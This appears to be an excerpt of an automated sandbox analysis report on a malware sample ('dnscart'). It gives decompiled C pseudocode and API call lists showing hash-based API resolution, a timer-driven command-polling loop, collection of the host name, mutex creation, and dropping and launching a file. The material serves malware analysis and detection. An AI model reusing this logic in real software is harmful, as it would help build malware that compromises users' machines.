    0x001f48e8
    0x00000000
    0x00000000
    0x00000000
    0x001f4477
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001f4de4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001f2f58
    0x001f5291
    0x001f5291
    0x001f5296
    0x001f5297
    0x00000000
    0x001f5297
    0x001f5521
    0x001f5525

    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    APIs
    • CreateToolhelp32Snapshot.KERNEL32 ref: 001F2151
    C-Code - Quality: 40%
    			E001F9CB8(void* __ecx, void* __edx, void* __edi) {
    				struct HINSTANCE__* _t17;
    				struct HINSTANCE__* _t23;
    				struct HINSTANCE__* _t29;
    				struct HINSTANCE__* _t35;
    				struct HINSTANCE__* _t41;
    				struct HINSTANCE__* _t47;
    				struct HINSTANCE__* _t53;
    				struct HINSTANCE__* _t59;
    				void* _t96;
    				void* _t97;
    				void* _t98;
    				void* _t99;
    				void* _t100;
    				void* _t101;
    				void* _t102;
    				void* _t103;
    				void* _t104;
    				void* _t106;
    
    				_t96 = __edi;
    				L001F1830(__ecx, __edx);
    				_t97 =  *(_t106 - 4);
    				_t17 = LoadLibraryW(_t97);
    				_push(0x1fc040);
    				_push(0x30116feb);
    				_push(0x21);
    				L001F1B10(_t17, 0x1f1040, _t96, _t97);
    				HeapFree(GetProcessHeap(), 0, _t97);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L001F1830(0x1f1568, 0xc);
    				_t98 =  *(_t106 - 4);
    				_t23 = LoadLibraryW(_t98);
    				_push(0x1fc0c8);
    				_push(0x1f598772);
    				_push(1);
    				L001F1B10(_t23, 0x1f1024, _t96, _t98);
    				HeapFree(GetProcessHeap(), 0, _t98);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L001F1830(0x1f1574, 0xc);
    				_t99 =  *(_t106 - 4);
    				_t29 = LoadLibraryW(_t99);
    				_push(0x1fc214);
    				_push(0x41696925);
    				_push(2);
    				L001F1B10(_t29, 0x1f1028, _t96, _t99);
    				HeapFree(GetProcessHeap(), 0, _t99);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L001F1830(0x1f1580, 0xc);
    				_t100 =  *(_t106 - 4);
    				_t35 = LoadLibraryW(_t100);
    				_push(0x1fc0c4);
    				_push(0x37dff52a);
    				_push(1);
    				L001F1B10(_t35, 0x1f100c, _t96, _t100);
    				HeapFree(GetProcessHeap(), 0, _t100);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L001F1830(0x1f1550, 0xc);
    				_t101 =  *(_t106 - 4);
    				_t41 = LoadLibraryW(_t101);
    				_push(0x1fc0cc);
    				_push(0x14c87d5f);
    				_push(1);
    				L001F1B10(_t41, 0x1f10c4, _t96, _t101);
    				HeapFree(GetProcessHeap(), 0, _t101);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L001F1830(0x1f1544, 0xc);
    				_t102 =  *(_t106 - 4);
    				_t47 = LoadLibraryW(_t102);
    				_push(0x1fc21c);
    				_push(0x786d5b64);
    				_push(2);
    				L001F1B10(_t47, 0x1f10c8, _t96, _t102);
    				HeapFree(GetProcessHeap(), 0, _t102);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L001F1830(0x1f1598, 0xc);
    				_t103 =  *(_t106 - 4);
    				_t53 = LoadLibraryW(_t103);
    				_push(0x1fc230);
    				_push(0x53973344);
    				_push(0xe);
    				L001F1B10(_t53, 0x1f1220, _t96, _t103);
    				HeapFree(GetProcessHeap(), 0, _t103);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L001F1830(0x1f158c, 0xc);
    				_t104 =  *(_t106 - 4);
    				_t59 = LoadLibraryW(_t104);
    				_push(0x1fc224);
    				_push(0x221bf2d2);
    				_push(3);
    				L001F1B10(_t59, 0x1f1214, _t96, _t104);
    				HeapFree(GetProcessHeap(), 0, _t104);
    				return L001F92F0(_t59);
    			}






















    APIs
    • LoadLibraryW.KERNEL32(?), ref: 001F9CC4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F9CE8
    • HeapFree.KERNEL32(00000000), ref: 001F9CEF
    • LoadLibraryW.KERNEL32(?), ref: 001F9D14
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F9D38
    • HeapFree.KERNEL32(00000000), ref: 001F9D3F
    • LoadLibraryW.KERNEL32(?), ref: 001F9D64
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F9D88
    • HeapFree.KERNEL32(00000000), ref: 001F9D8F
    • LoadLibraryW.KERNEL32(?), ref: 001F9DB4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F9DD8
    • HeapFree.KERNEL32(00000000), ref: 001F9DDF
    • LoadLibraryW.KERNEL32(?), ref: 001F9E04
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F9E28
    • HeapFree.KERNEL32(00000000), ref: 001F9E2F
    • LoadLibraryW.KERNEL32(?), ref: 001F9E54
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F9E78
    • HeapFree.KERNEL32(00000000), ref: 001F9E7F
    • LoadLibraryW.KERNEL32(?), ref: 001F9EA4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F9EC8
    • HeapFree.KERNEL32(00000000), ref: 001F9ECF
    • LoadLibraryW.KERNEL32(?), ref: 001F9EF4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F9F18
    • HeapFree.KERNEL32(00000000), ref: 001F9F1F
    C-Code - Quality: 89%
    			E001F8E20(void* __ebx, void* __edx, void* __edi) {
    				void* _v16;
    				void* _v24;
    				char _v28;
    				void* _v32;
    				char _v36;
    				intOrPtr _v44;
    				void* _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				char _v76;
    				void* _v84;
    				void* _v92;
    				signed int _t28;
    				long _t29;
    
    				_t28 = GetTickCount();
    				if(_t28 <  *0x1fc278) {
    					L24:
    					return _t28;
    				} else {
    					_t29 =  *0x1fc280; // 0x0
    					_t28 = _t29 - 1;
    					if(_t28 > 3) {
    						goto L24;
    					} else {
    						switch( *((intOrPtr*)(_t28 * 4 +  &M001F9094))) {
    							case 0:
    								 *0x1fc280 = 2;
    								return _t28;
    								goto L25;
    							case 1:
    								 *0x1fc280 = 0;
    								__eax = L001F9670();
    								__eax = __eax;
    								if(__eax == 0) {
    									 *0x1fc280 = 3;
    									_pop(__esi);
    									return __eax;
    								} else {
    									if(__eax != 0) {
    										goto L24;
    									} else {
    										__eax = SetEvent( *0x1fc29c);
    										_pop(__esi);
    										return __eax;
    									}
    								}
    								goto L25;
    							case 2:
    								 *0x1fc280 = 0;
    								 *0x1fc294 = 0x1f1270;
    								 *0x1fc298 = 0x1f1270;
    								__eax = L001F2310();
    								__eax =  *0x1fc02c; // 0x1f12f8
    								 *0x1fc26c = __eax;
    								__eax =  *0x1fc030; // 0x6a
    								 *0x1fc268 = 0x1fc2a8;
    								 *0x1fc270 = __eax;
    								 *0x1fc280 = 4;
    								_pop(__esi);
    								return __eax;
    								goto L25;
    							case 3:
    								__ecx =  &_v28;
    								 *0x1fc280 = 0;
    								__eax = L001F8BF0( &_v28);
    								__ecx =  &_v36;
    								__eax = L001F8D90(__eax,  &_v36);
    								__eax =  *0x1fcbd0; // 0x0
    								_push(0x1fc2a8);
    								_v32 = __eax;
    								_v44 = 0x1fc2a8;
    								_v44 =  *0x1fc130();
    								__eax =  *0x1fc2a4; // 0x0
    								_v52 = __eax;
    								do {
    									__ecx =  &_v24;
    									__esi = 0xdbba0;
    									__eax = L001F8960(__edx, 0xdbba0);
    									__ecx =  &_v16;
    									__eax = L001FA7F0(__edx, 0xdbba0);
    									__edx =  &_v52;
    									__ecx =  &_v84;
    									if(L001F9FD0(__ebx, __ecx, __edx) != 0) {
    										__eax =  &_v92;
    										_push( &_v92);
    										__eax =  &_v84;
    										_push(__eax);
    										__eax = L001F8560(__eax, __ecx);
    										__esp = __esp + 8;
    										if(__eax == 0) {
    											__eax =  *0x1fc298; // 0x0
    											__esi = 0x7530;
    											__eax = __eax + 8;
    											 *0x1fc298 = __eax;
    											 *0x1fc298 = __eax;
    										} else {
    											__eax = L001F99F0(__eax, __ecx, __edi);
    											__ecx = 0;
    											__eax = E001F88F0(0);
    											__ecx = 0;
    											__eax = E001FA7A0(0);
    											__edx =  &_v76;
    											__ecx =  &_v92;
    											if(L001FA1D0( &_v92, __edx) != 0) {
    												__eax = L001F1750(__edi);
    												__edx = _v72;
    												if(__edx != 0) {
    													__ecx = _v76;
    													__eax = L001F9AE0(__eax, _v76, __edx);
    												}
    												__eax = L001F1750(__edi);
    												__edx = _v64;
    												if(__edx != 0) {
    													__ecx = _v68;
    													__eax = L001F89D0(__edx, __esi);
    													__esi = 0;
    												}
    												__eax = L001F1750(__edi);
    												__edx = _v56;
    												if(__edx != 0) {
    													__ecx = _v60;
    													__eax = L001FA860(__edx, __esi);
    													__esi = 0;
    												}
    											}
    											GetProcessHeap() = HeapFree(__eax, 0, _v92);
    										}
    										GetProcessHeap() = HeapFree(__eax, 0, _v84);
    									}
    									GetProcessHeap() = HeapFree(__eax, 0, _v24);
    									GetProcessHeap() = HeapFree(__eax, 0, _v16);
    								} while (__esi == 0);
    								__eax = GetTickCount();
    								__eax = __eax + __esi;
    								 *0x1fc280 = 4;
    								 *0x1fc278 = __eax;
    								GetProcessHeap() = HeapFree(__eax, 0, _v32);
    								goto L24;
    						}
    					}
    				}
    				L25:
    			}





















    APIs
    • GetTickCount.KERNEL32 ref: 001F8E2A
    • SetEvent.KERNEL32 ref: 001F8E84
    • lstrlen.KERNEL32 ref: 001F8F26
    • HeapFree.KERNEL32(00000000), ref: 001F9087
      • Part of subcall function 001F88F0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001F8908
      • Part of subcall function 001FA7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001FA7B8
      • Part of subcall function 001FA7A0: CloseHandle.KERNEL32(?), ref: 001FA7CC
      • Part of subcall function 001FA7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001F8F95), ref: 001FA7D5
      • Part of subcall function 001FA7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001FA7DC
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F8FF2
    • HeapFree.KERNEL32(00000000), ref: 001F8FF9
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F9028
    • HeapFree.KERNEL32(00000000), ref: 001F902F
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F903B
    • HeapFree.KERNEL32(00000000), ref: 001F9042
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F904E
    • HeapFree.KERNEL32(00000000), ref: 001F9055
    • GetTickCount.KERNEL32 ref: 001F9063
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F9080
    APIs
    • _snwprintf.NTDLL ref: 001F94DE
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F94EA
    • HeapFree.KERNEL32(00000000), ref: 001F94F1
    • _snwprintf.NTDLL ref: 001F950F
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F951B
    • HeapFree.KERNEL32(00000000), ref: 001F9522
    • CreateFileW.KERNEL32(001FC9C8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001F953C
    • GetComputerNameW.KERNEL32(?,?), ref: 001F95B1
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 001F9601
    • RtlAllocateHeap.NTDLL(00000000), ref: 001F9608
    • _snprintf.NTDLL ref: 001F9642
    • GetProcessHeap.KERNEL32(00000000,00000010), ref: 001F964E
    • HeapFree.KERNEL32(00000000), ref: 001F9655
    C-Code - Quality: 56%
    			E001FA658() {
    				void* _t22;
    				void* _t24;
    				void* _t26;
    
    				WriteFile();
    				CloseHandle(_t24);
    				memset(_t26 - 0x5c, 0, 0x44);
    				 *(_t26 - 0x5c) = 0x44;
    				if(CreateProcessW(_t26 - 0x320, 0, 0, 0, 0, 0, 0, 0, _t26 - 0x5c, _t26 - 0x18) != 0) {
    					CloseHandle( *(_t26 - 0x18));
    					_push( *((intOrPtr*)(_t26 - 0x14)));
    					CloseHandle();
    				}
    				HeapFree(GetProcessHeap(), 0, _t22);
    				return 0;
    			}







    APIs
    • WriteFile.KERNEL32 ref: 001FA658
    • CloseHandle.KERNEL32 ref: 001FA65F
    • memset.NTDLL ref: 001FA66D
    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001FA69A
    • CloseHandle.KERNEL32(?), ref: 001FA6A7
    • CloseHandle.KERNEL32(?), ref: 001FA6B0
    • GetProcessHeap.KERNEL32(00000000), ref: 001FA6B9
    • HeapFree.KERNEL32(00000000), ref: 001FA6C0
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    C-Code - Quality: 100%
    			E001FA6E0(void* __ecx) {
    				void* _t15;
    				void* _t22;
    				void _t25;
    				void* _t29;
    				void* _t31;
    				void* _t32;
    				void* _t33;
    
    				_t31 = __ecx;
    				_t15 = RtlAllocateHeap(GetProcessHeap(), 8,  *((intOrPtr*)(__ecx + 0xc)) + 0x10);
    				_t33 = _t15;
    				if(_t33 == 0) {
    					return _t15;
    				} else {
    					 *_t33 =  *_t31;
    					 *((intOrPtr*)(_t33 + 4)) =  *((intOrPtr*)(_t31 + 4));
    					_t4 = _t33 + 0x10; // 0x10
    					_t29 = _t4;
    					 *(_t33 + 8) = _t29;
    					 *(_t33 + 0xc) =  *(_t31 + 0xc);
    					memcpy(_t29,  *(_t31 + 8),  *(_t31 + 0xc));
    					_t32 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
    					if(_t32 == 0) {
    						L5:
    						return HeapFree(GetProcessHeap(), 0, _t33);
    					}
    					 *(_t32 + 4) =  *_t33;
    					_t22 = CreateThread(0, 0, 0x1fa3f0, _t33, 0, 0);
    					 *(_t32 + 8) = _t22;
    					if(_t22 == 0) {
    						HeapFree(GetProcessHeap(), 0, _t32);
    						goto L5;
    					}
    					_t25 =  *0x1fcbd4; // 0x0
    					 *_t32 = _t25;
    					 *0x1fcbd4 = _t32;
    					return _t25;
    				}
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000008,?), ref: 001FA6ED
    • RtlAllocateHeap.NTDLL(00000000), ref: 001FA6F4
    • memcpy.NTDLL(00000010,?,?), ref: 001FA721
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 001FA72E
    • RtlAllocateHeap.NTDLL(00000000), ref: 001FA735
    • CreateThread.KERNEL32(00000000,00000000,Function_0000A3F0,00000000,00000000,00000000), ref: 001FA754
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001FA774
    • HeapFree.KERNEL32(00000000), ref: 001FA77B
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001FA784
    • HeapFree.KERNEL32(00000000), ref: 001FA78B
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    APIs
    • CreateEventW.KERNEL32 ref: 001F91F0
    • SignalObjectAndWait.KERNEL32(00000000,000000FF,00000000), ref: 001F920A
    • ResetEvent.KERNEL32 ref: 001F9221
    • ReleaseMutex.KERNEL32 ref: 001F922A
    • CloseHandle.KERNEL32 ref: 001F9231
    • GetTickCount.KERNEL32 ref: 001F923B
    • CreateTimerQueueTimer.KERNEL32(?,00000000,Function_00008E20,00000000,00001388,000003E8,00000010), ref: 001F926E
    • WaitForSingleObject.KERNEL32(000000FF), ref: 001F9280
    • DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 001F928D
    • CloseHandle.KERNEL32 ref: 001F9299
      • Part of subcall function 001FA7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001FA7B8
      • Part of subcall function 001FA7A0: CloseHandle.KERNEL32(?), ref: 001FA7CC
      • Part of subcall function 001FA7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001F8F95), ref: 001FA7D5
      • Part of subcall function 001FA7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001FA7DC
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    C-Code - Quality: 26%
    			E001FA515(void* __edi, void* __eflags) {
    				void* _t32;
    				void* _t34;
    				void* _t35;
    				void* _t37;
    
    				_t32 = __edi;
    				WriteFile(??, ??, ??, ??, ??);
    				CloseHandle(_t34);
    				L001F1830(0x1f1398, 4);
    				_t35 =  *(_t37 - 4);
    				 *0x1fc20c(_t37 - 0x528, 0x104, _t35, _t37 - 0x320, 0x6e15c1da, _t37 - 4);
    				HeapFree(GetProcessHeap(), 0, _t35);
    				_push(_t37 - 0x18);
    				_push( *((intOrPtr*)(_t37 + 8)));
    				if(L001F21B0(_t37 - 0x528, _t32) != 0) {
    					CloseHandle( *(_t37 - 0x18));
    					CloseHandle( *(_t37 - 0x14));
    				}
    				_push( *((intOrPtr*)(_t37 + 8)));
    				CloseHandle();
    				HeapFree(GetProcessHeap(), 0, _t32);
    				return 0;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 001F8C28
    • lstrlenW.KERNEL32(?), ref: 001F8C35
    • lstrlenW.KERNEL32(00000004), ref: 001F8C84
    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001F8CA0
    • RtlAllocateHeap.NTDLL(00000000), ref: 001F8CA7
    • lstrcmpiW.KERNEL32(00000004,?), ref: 001F8CC5
    • lstrcpyW.KERNEL32(00000000,00000004), ref: 001F8CDA
    • lstrlenW.KERNEL32(00000004), ref: 001F8CE4
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    APIs
    • WTSGetActiveConsoleSessionId.KERNEL32 ref: 001FA420
    • GetTickCount.KERNEL32 ref: 001FA5BB
    • _snwprintf.NTDLL ref: 001FA60E
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001FA61A
    • HeapFree.KERNEL32(00000000), ref: 001FA621
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 001FA640
    • GetProcessHeap.KERNEL32(00000000), ref: 001FA6B9
    • HeapFree.KERNEL32(00000000), ref: 001FA6C0
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    C-Code - Quality: 26%
    			E001FA46E(void* __edi, void* __eflags) {
    				signed int _t22;
    				void* _t28;
    				void* _t59;
    				void* _t63;
    				void* _t64;
    				void* _t66;
    				void* _t67;
    
    				_t59 = __edi;
    				 *0x1fc214();
    				_t22 = GetTickCount();
    				_t2 = (_t22 & 0x00000007) + 1; // 0x1
    				L001F2270(_t67 - 0x98, _t2);
    				 *((short*)(_t67 + (_t22 & 0x00000007) * 2 - 0x96)) = 0;
    				L001F1830(0x1f15a4, 0xc);
    				_t63 =  *(_t67 - 4);
    				_t28 = _t67 - 0x320;
    				 *0x1fc20c(_t28, 0x104, _t63, _t28, _t67 - 0x98, 0x6e15c1da, _t67 - 4);
    				HeapFree(GetProcessHeap(), 0, _t63);
    				_t64 = CreateFileW(_t67 - 0x320, 0x40000000, 0, 0, 2, 0x80, 0);
    				if(_t64 != 0xffffffff) {
    					goto 0x331e83;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					WriteFile();
    					CloseHandle(_t64);
    					L001F1830(0x1f1398, 4);
    					_t66 =  *(_t67 - 4);
    					 *0x1fc20c(_t67 - 0x528, 0x104, _t66, _t67 - 0x320, 0x6e15c1da, _t67 - 4);
    					HeapFree(GetProcessHeap(), 0, _t66);
    					_push(_t67 - 0x18);
    					_push( *((intOrPtr*)(_t67 + 8)));
    					if(L001F21B0(_t67 - 0x528, _t59) != 0) {
    						CloseHandle( *(_t67 - 0x18));
    						CloseHandle( *(_t67 - 0x14));
    					}
    				}
    				_push( *((intOrPtr*)(_t67 + 8)));
    				CloseHandle();
    				HeapFree(GetProcessHeap(), 0, _t59);
    				return 0;
    			}

    APIs
    • GetTickCount.KERNEL32 ref: 001FA474
    • _snwprintf.NTDLL ref: 001FA4C7
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001FA4D3
    • HeapFree.KERNEL32(00000000), ref: 001FA4DA
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 001FA4F9
    • CloseHandle.KERNEL32(?), ref: 001FA6B0
    • GetProcessHeap.KERNEL32(00000000), ref: 001FA6B9
    • HeapFree.KERNEL32(00000000), ref: 001FA6C0
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    APIs
    • _snwprintf.NTDLL ref: 001F9168
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F9174
    • HeapFree.KERNEL32(00000000), ref: 001F917B
    • _snwprintf.NTDLL ref: 001F91AC
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F91B8
    • HeapFree.KERNEL32(00000000), ref: 001F91BF
    • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 001F91D0
      • Part of subcall function 001FA7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001FA7B8
      • Part of subcall function 001FA7A0: CloseHandle.KERNEL32(?), ref: 001FA7CC
      • Part of subcall function 001FA7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001F8F95), ref: 001FA7D5
      • Part of subcall function 001FA7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001FA7DC
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    C-Code - Quality: 20%
    			E001F85E1(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __eflags) {
    				signed char* _t28;
    				void* _t30;
    				void _t49;
    				intOrPtr _t52;
    				void* _t53;
    				signed char* _t56;
    				void* _t58;
    				intOrPtr* _t64;
    				void* _t66;
    				void* _t67;
    				void* _t69;
    
    				_t64 = __edi;
    				_t53 = __ebx;
    				L001F1830(__ecx, __edx);
    				_t56 =  *0x1fc298; // 0x0
    				_t66 =  *(_t69 + 8);
    				 *0x1fc20c(_t69 - 0xb8, 0x40, _t66, _t56[3] & 0x000000ff, _t56[2] & 0x000000ff, _t56[1] & 0x000000ff,  *_t56 & 0x000000ff);
    				HeapFree(GetProcessHeap(), 0, _t66);
    				_t28 =  *0x1fc298; // 0x0
    				_t61 = _t69 - 0xb8;
    				_push(_t56);
    				_t57 = _t69 - 0x38;
    				_push(_t28[4] & 0x0000ffff);
    				_t30 = L001F1C50(_t69 - 0x38, _t69 - 0xb8, _t64);
    				_t67 =  *(_t69 - 8);
    				if(_t30 != 0) {
    					goto 0x33165c;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					if(L001F1D40(_t57) != 0) {
    						goto 0x331674;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						if(L001F1E80(_t41, _t57, _t61) != 0) {
    							goto 0x33168c;
    							asm("int3");
    							asm("int3");
    							if(L001F2560(_t61, _t64) != 0) {
    								_t58 =  *(_t69 - 0x10);
    								_t49 =  *_t58;
    								 *_t53 = _t49;
    								if(_t49 < 0x4000000) {
    									_push(_t53);
    									_t52 = L001F8500(_t58 + 4,  *((intOrPtr*)(_t69 - 0xc)) - 4, _t64);
    									_t58 =  *(_t69 - 0x10);
    									 *_t64 = _t52;
    								}
    								HeapFree(GetProcessHeap(), 0, _t58);
    							}
    							HeapFree(GetProcessHeap(), ??, ??);
    						}
    						 *0x1fc260( *((intOrPtr*)(_t69 - 0x30)));
    					}
    					 *0x1fc260( *((intOrPtr*)(_t69 - 0x34)));
    					 *0x1fc260( *((intOrPtr*)(_t69 - 0x38)));
    				}
    				HeapFree(GetProcessHeap(), 0, 0);
    				HeapFree(GetProcessHeap(), 0, _t67);
    				HeapFree(GetProcessHeap(), ??, ??);
    				HeapFree(GetProcessHeap(), ??, ??);
    				return 0 |  *_t64 != 0x00000000;
    			}

    APIs
    • _snwprintf.NTDLL ref: 001F860C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F8618
    • HeapFree.KERNEL32(00000000), ref: 001F861F
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F86F1
    • HeapFree.KERNEL32(00000000), ref: 001F86F8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F8701
    • HeapFree.KERNEL32(00000000), ref: 001F8708
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    C-Code - Quality: 34%
    			E001F9569(signed short __edx, void* __edi, void* __esi) {
    				int _t13;
    				signed int _t20;
    				void* _t24;
    				signed short* _t26;
    				signed short _t27;
    				void* _t28;
    				void* _t29;
    				void* _t30;
    				void* _t31;
    				void* _t32;
    
    				_t29 = __esi;
    				_t28 = __edi;
    				_t27 = __edx;
    				_t24 = MapViewOfFile(??, ??, ??, ??, ??);
    				if(_t24 != 0) {
    					 *0x1fcbd0 = RtlComputeCrc32(0, _t24, GetFileSize(__esi, 0));
    					UnmapViewOfFile(_t24);
    				}
    				CloseHandle(_t28);
    				CloseHandle(_t29);
    				 *(_t31 - 8) = 0x10;
    				_t13 = GetComputerNameW(_t31 - 0x28, _t31 - 8);
    				if(_t13 != 0) {
    					_t26 = _t31 - 0x28;
    					if( *(_t31 - 0x28) != 0) {
    						goto 0x3319f0;
    						asm("int3");
    						do {
    							_t20 =  *_t26 & 0x0000ffff;
    							if(_t20 < 0x30 || _t20 > 0x39) {
    								if(_t20 < 0x61 || _t20 > 0x7a) {
    									if(_t20 < 0x41 || _t20 > 0x5a) {
    										 *_t26 = _t27;
    									}
    								}
    							}
    							_t26 =  &(_t26[1]);
    						} while ( *_t26 != 0);
    					}
    					_t30 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
    					if(_t30 == 0) {
    						_t30 =  *(_t31 - 8);
    					} else {
    						goto 0x331a04;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
